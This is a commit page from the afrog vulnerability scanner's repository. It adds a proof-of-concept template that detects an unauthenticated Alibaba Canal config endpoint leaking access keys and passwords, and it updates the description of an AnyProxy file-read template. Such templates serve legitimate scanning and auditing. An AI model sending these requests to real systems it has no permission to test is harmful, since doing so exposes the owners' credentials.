Projects STRLCPY afrog Commits 8f9f53c9
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/vulnerability/alibaba-canal-config-leak.yaml
     1 +id: alibaba-canal-config-leak
     2 + 
     3 +info:
     4 + name: Alibaba Canal config 云密钥信息泄露漏洞
     5 + author: zan8in
     6 + severity: critical
     7 + description: |
     8 + 由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露
     9 + title="Canal Admin"
     10 + reference:
     11 + - http://wiki.peiqi.tech/wiki/webapp/AlibabaCanal/Alibaba%20Canal%20config%20%E4%BA%91%E5%AF%86%E9%92%A5%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
     12 + 
     13 +rules:
     14 + r0:
     15 + request:
     16 + method: GET
     17 + path: /api/v1/canal/config/1/0
     18 + expression: response.status == 200 && response.body.bcontains(b'"code":20000') && response.body.bcontains(b'"name":"canal.properties"')
     19 +expression: r0()
  • ■ ■ ■ ■ ■ ■
    pocs/afrog-pocs/e-vulnerability/anyproxy-directory-traversal.yaml
    skipped 4 lines
    5 5   author: zan8in
    6 6   severity: critical
    7 7   description: |
     8 + Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息
    8 9   fofa: Anyproxy
    9 10   reference:
    10 11   - https://github.com/alibaba/anyproxy/issues/391
     12 + - http://wiki.peiqi.tech/wiki/webapp/Alibaba%20AnyProxy/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
    11 13   
    12 14  rules:
    13 15   r0:
    skipped 5 lines
Please wait...
Page is in error, reload to recover